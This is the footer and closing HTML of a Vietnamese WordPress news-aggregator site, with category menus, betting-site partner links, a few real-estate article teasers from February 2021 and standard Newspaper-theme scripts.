xe máy</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-665"><a href="http://allsexpix.com/category/the-thao">Thể thao</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-662"><a href="http://allsexpix.com/category/kinh-doanh">Kinh doanh</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-658"><a href="http://allsexpix.com/category/nha-dat">Nhà đất</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1751"><a href="http://allsexpix.com/category/phap-luat">Pháp luật</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-4512"><a href="http://allsexpix.com/category/thoi-trang">Thời trang</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-659"><a href="http://allsexpix.com/category/cong-nghe">Công nghệ</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1750"><a href="http://allsexpix.com/category/giai-tri">Giải trí</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5024"><a href="http://allsexpix.com/category/noi-ngoai-that">Nội ngoại thất</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5025"><a href="http://allsexpix.com/category/san-pham-dich-vu">Sản phẩm – dịch vụ</a></li> </ul></div> </div> <div class="td-pb-span td-sub-footer-copy"> © Trang tin tức tổng hợp từ nhiều nguồn khác nhau. Trang web đang chạy thử nghiệm và chờ xin giấy phép của BTTTT. </br> Liên kết đối tác: <a href="http://soikeo.info/" title="Soi kèo bóng đá">http://soikeo.info/</a> , <a href="https://nhacaiuytin247.com/nha-cai-fcb8" title="Review nhà cái Fcb8 - Nha Cai Uy Tin 247">https://nhacaiuytin247.com/nha-cai-fcb8</a> , <a href="https://tipkeomoingay.club/ca-cuoc-bong-da" title="Review Nhà Cái Cá Cược Bóng Đá - Tip Kèo Mỗi Ngày Club">https://tipkeomoingay.club/ca-cuoc-bong-da</a> , <a href="https://gamebai.club/" target="_blank" title = "game bài">https://gamebai.club/</a> , <a href="https://truoctran.com/" target="_blank" title = "Truoctran">https://truoctran.com/</a> </div> </div> </div> </div> </div><!--close td-outer-wrap--> <div class="td-more-articles-box"> <i class="td-icon-close td-close-more-articles-box"></i> <span class="td-more-articles-box-title">NHIỀU BÀI VIẾT HƠN</span> <div class="td-content-more-articles-box"> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://allsexpix.com/nha-dat/richlane-residences-can-ho-uu-diem-ben-song-dau-tu-lon.html" rel="bookmark" title="RichLane Residences Căn hộ ưu điểm bên sông đầu tư lớn"><img width="100" height="70" class="entry-thumb" src="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang-100x70.jpg" srcset="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang-100x70.jpg 100w, http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="RichLane Residences Căn hộ ưu điểm bên sông đầu tư lớn"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://allsexpix.com/nha-dat/richlane-residences-can-ho-uu-diem-ben-song-dau-tu-lon.html" rel="bookmark" title="RichLane Residences Căn hộ ưu điểm bên sông đầu tư lớn">RichLane Residences Căn hộ ưu điểm bên sông đầu tư lớn</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-02-27T09:00:42+00:00" >27 Tháng Hai, 2021</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://allsexpix.com/nha-dat/chung-cu-cao-cap-carillon-1-song-nang-dong.html" rel="bookmark" title="Chung cư cao cấp Carillon 1 sống năng động"><img width="100" height="70" class="entry-thumb" src="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang2-100x70.jpg" srcset="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang2-100x70.jpg 100w, http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang2-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Chung cư cao cấp Carillon 1 sống năng động"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://allsexpix.com/nha-dat/chung-cu-cao-cap-carillon-1-song-nang-dong.html" rel="bookmark" title="Chung cư cao cấp Carillon 1 sống năng động">Chung cư cao cấp Carillon 1 sống năng động</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-02-27T08:00:55+00:00" >27 Tháng Hai, 2021</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://allsexpix.com/nha-dat/khu-du-an-him-lam-riverside-song-nhop-nhip.html" rel="bookmark" title="Khu dự án Him Lam Riverside sống nhộp nhịp"><img width="100" height="70" class="entry-thumb" src="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-Astral-City2-100x70.jpg" srcset="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-Astral-City2-100x70.jpg 100w, http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-Astral-City2-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Khu dự án Him Lam Riverside sống nhộp nhịp"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://allsexpix.com/nha-dat/khu-du-an-him-lam-riverside-song-nhop-nhip.html" rel="bookmark" title="Khu dự án Him Lam Riverside sống nhộp nhịp">Khu dự án Him Lam Riverside sống nhộp nhịp</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-02-27T08:00:30+00:00" >27 Tháng Hai, 2021</time></span> </div> </div> </div> </div> </div> <!-- Theme: Newspaper by tagDiv.com 2017 Version: 7.8.1 (rara) Deploy mode: deploy uid: 603a1798c87f6 --> <script type='text/javascript' src='http://allsexpix.com/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=7.8.1'></script> <script type='text/javascript' src='http://allsexpix.com/wp-includes/js/comment-reply.min.js?ver=5.0-alpha-43406'></script> <script type='text/javascript' src='http://allsexpix.com/wp-includes/js/wp-embed.min.js?ver=5.0-alpha-43406'></script> <script async="async" type='text/javascript' src='http://allsexpix.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1'></script> <!-- JS generated by theme --> <script> (function(){ var html_jquery_obj = jQuery('html'); if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) { var path = 'http://allsexpix.com/wp-content/themes/Newspaper/style.css'; jQuery.get(path, function(data) { var str_split_separator = '#td_css_split_separator'; var arr_splits = data.split(str_split_separator); var arr_length = arr_splits.length; if (arr_length > 1) { var dir_path = 'http://allsexpix.com/wp-content/themes/Newspaper'; var splited_css = ''; for (var i = 0; i < arr_length; i++) { if (i > 0) { arr_splits[i] = str_split_separator + ' ' + arr_splits[i]; } //jQuery('head').append('<style>' + arr_splits[i] + '</style>'); var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) { return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,''); }); splited_css += "<style>" + formated_str + "</style>"; } var td_theme_css = jQuery('link#td-theme-css'); if (td_theme_css.length) { td_theme_css.after(splited_css); } } }); } })(); </script> </body> </html>